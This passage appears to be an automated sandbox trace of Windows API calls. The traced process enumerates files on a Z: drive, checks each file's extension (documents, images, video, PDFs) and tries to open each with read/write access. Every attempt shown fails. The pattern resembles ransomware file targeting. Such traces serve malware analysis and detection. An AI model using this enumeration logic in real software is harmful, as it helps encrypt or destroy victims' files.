[0187.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.348] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x96e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CO3BSlwl0AGjF6ik7YUj.ods", cAlternateFileName="")) returned 1 [0187.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.348] PathFindExtensionW (pszPath="Z:\\CO3BSlwl0AGjF6ik7YUj.ods") returned=".ods" [0187.353] CreateFileW (lpFileName="Z:\\CO3BSlwl0AGjF6ik7YUj.ods" (normalized: "z:\\co3bslwl0agjf6ik7yuj.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.355] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd2b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8Zpef8RfCY9KqCV7PE.avi", cAlternateFileName="")) returned 1 [0187.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.355] PathFindExtensionW (pszPath="Z:\\8Zpef8RfCY9KqCV7PE.avi") returned=".avi" [0187.360] CreateFileW (lpFileName="Z:\\8Zpef8RfCY9KqCV7PE.avi" (normalized: "z:\\8zpef8rfcy9kqcv7pe.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.362] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe944, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ad6eYrGeF6ADM39N.odt", cAlternateFileName="")) returned 1 [0187.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.362] PathFindExtensionW (pszPath="Z:\\Ad6eYrGeF6ADM39N.odt") returned=".odt" [0187.367] CreateFileW (lpFileName="Z:\\Ad6eYrGeF6ADM39N.odt" (normalized: "z:\\ad6eyrgef6adm39n.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.372] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd0a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TtGiLOV0AbV.jpg", cAlternateFileName="")) returned 1 [0187.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.372] PathFindExtensionW (pszPath="Z:\\TtGiLOV0AbV.jpg") returned=".jpg" [0187.376] CreateFileW (lpFileName="Z:\\TtGiLOV0AbV.jpg" (normalized: "z:\\ttgilov0abv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.378] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12d87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rIxvZBz.mp4", cAlternateFileName="")) returned 1 [0187.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.378] PathFindExtensionW (pszPath="Z:\\rIxvZBz.mp4") returned=".mp4" [0187.382] CreateFileW (lpFileName="Z:\\rIxvZBz.mp4" (normalized: "z:\\rixvzbz.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.384] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xee59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywVBC9F7.mkv", cAlternateFileName="")) returned 1 [0187.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.384] PathFindExtensionW (pszPath="Z:\\ywVBC9F7.mkv") returned=".mkv" [0187.388] CreateFileW (lpFileName="Z:\\ywVBC9F7.mkv" (normalized: "z:\\ywvbc9f7.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.390] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x78b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EWYXiU.png", cAlternateFileName="")) returned 1 [0187.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.390] PathFindExtensionW (pszPath="Z:\\EWYXiU.png") returned=".png" [0187.394] CreateFileW (lpFileName="Z:\\EWYXiU.png" (normalized: "z:\\ewyxiu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.396] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xae3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yxa8HDFZVHjsem9K2t.pptx", cAlternateFileName="")) returned 1 [0187.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.396] PathFindExtensionW (pszPath="Z:\\Yxa8HDFZVHjsem9K2t.pptx") returned=".pptx" [0187.401] CreateFileW (lpFileName="Z:\\Yxa8HDFZVHjsem9K2t.pptx" (normalized: "z:\\yxa8hdfzvhjsem9k2t.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.402] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xedc3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9RqmGLGyrOcA3.mp3", cAlternateFileName="")) returned 1 [0187.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.403] PathFindExtensionW (pszPath="Z:\\9RqmGLGyrOcA3.mp3") returned=".mp3" [0187.408] CreateFileW (lpFileName="Z:\\9RqmGLGyrOcA3.mp3" (normalized: "z:\\9rqmglgyroca3.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.410] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd7fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pC3tGDvF.doc", cAlternateFileName="")) returned 1 [0187.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.410] PathFindExtensionW (pszPath="Z:\\pC3tGDvF.doc") returned=".doc" [0187.415] CreateFileW (lpFileName="Z:\\pC3tGDvF.doc" (normalized: "z:\\pc3tgdvf.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.417] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9668, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yn0PYQpVz8.doc", cAlternateFileName="")) returned 1 [0187.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.417] PathFindExtensionW (pszPath="Z:\\Yn0PYQpVz8.doc") returned=".doc" [0187.423] CreateFileW (lpFileName="Z:\\Yn0PYQpVz8.doc" (normalized: "z:\\yn0pyqpvz8.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.424] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x153ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qkovu43RZ2n.odt", cAlternateFileName="")) returned 1 [0187.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.424] PathFindExtensionW (pszPath="Z:\\qkovu43RZ2n.odt") returned=".odt" [0187.430] CreateFileW (lpFileName="Z:\\qkovu43RZ2n.odt" (normalized: "z:\\qkovu43rz2n.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.431] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1663f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EjMAFky9mSGD.mp4", cAlternateFileName="")) returned 1 [0187.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.431] PathFindExtensionW (pszPath="Z:\\EjMAFky9mSGD.mp4") returned=".mp4" [0187.437] CreateFileW (lpFileName="Z:\\EjMAFky9mSGD.mp4" (normalized: "z:\\ejmafky9msgd.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.439] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8daf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dSLdNV.doc", cAlternateFileName="")) returned 1 [0187.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.439] PathFindExtensionW (pszPath="Z:\\dSLdNV.doc") returned=".doc" [0187.445] CreateFileW (lpFileName="Z:\\dSLdNV.doc" (normalized: "z:\\dsldnv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.446] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7249, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VWgLcoYpNW87TI6XH.ods", cAlternateFileName="")) returned 1 [0187.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.446] PathFindExtensionW (pszPath="Z:\\VWgLcoYpNW87TI6XH.ods") returned=".ods" [0187.452] CreateFileW (lpFileName="Z:\\VWgLcoYpNW87TI6XH.ods" (normalized: "z:\\vwglcoypnw87ti6xh.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.453] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17618, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qw5s04.swf", cAlternateFileName="")) returned 1 [0187.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.454] PathFindExtensionW (pszPath="Z:\\qw5s04.swf") returned=".swf" [0187.462] CreateFileW (lpFileName="Z:\\qw5s04.swf" (normalized: "z:\\qw5s04.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.465] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa055, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vfO9r7XUdR7Mn9SuaJu.flv", cAlternateFileName="")) returned 1 [0187.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.465] PathFindExtensionW (pszPath="Z:\\vfO9r7XUdR7Mn9SuaJu.flv") returned=".flv" [0187.470] CreateFileW (lpFileName="Z:\\vfO9r7XUdR7Mn9SuaJu.flv" (normalized: "z:\\vfo9r7xudr7mn9suaju.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.472] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf66c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yvd6SxFNPFFdWKTf.bmp", cAlternateFileName="")) returned 1 [0187.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.472] PathFindExtensionW (pszPath="Z:\\yvd6SxFNPFFdWKTf.bmp") returned=".bmp" [0187.478] CreateFileW (lpFileName="Z:\\yvd6SxFNPFFdWKTf.bmp" (normalized: "z:\\yvd6sxfnpffdwktf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.480] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11028, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hs8SJlE.pdf", cAlternateFileName="")) returned 1 [0187.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.480] PathFindExtensionW (pszPath="Z:\\Hs8SJlE.pdf") returned=".pdf" [0187.485] CreateFileW (lpFileName="Z:\\Hs8SJlE.pdf" (normalized: "z:\\hs8sjle.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.487] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11e0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k8F1wk5HusiiaH6.pdf", cAlternateFileName="")) returned 1 [0187.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.487] PathFindExtensionW (pszPath="Z:\\k8F1wk5HusiiaH6.pdf") returned=".pdf" [0187.492] CreateFileW (lpFileName="Z:\\k8F1wk5HusiiaH6.pdf" (normalized: "z:\\k8f1wk5husiiah6.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.494] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5123, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r4V67Cxk5wf.pptx", cAlternateFileName="")) returned 1 [0187.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.494] PathFindExtensionW (pszPath="Z:\\r4V67Cxk5wf.pptx") returned=".pptx" [0187.499] CreateFileW (lpFileName="Z:\\r4V67Cxk5wf.pptx" (normalized: "z:\\r4v67cxk5wf.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.504] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6ed2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ljwMlJaUR.gif", cAlternateFileName="")) returned 1 [0187.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.504] PathFindExtensionW (pszPath="Z:\\ljwMlJaUR.gif") returned=".gif" [0187.509] CreateFileW (lpFileName="Z:\\ljwMlJaUR.gif" (normalized: "z:\\ljwmljaur.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.513] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa862, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I235155.jpg", cAlternateFileName="")) returned 1 [0187.513] 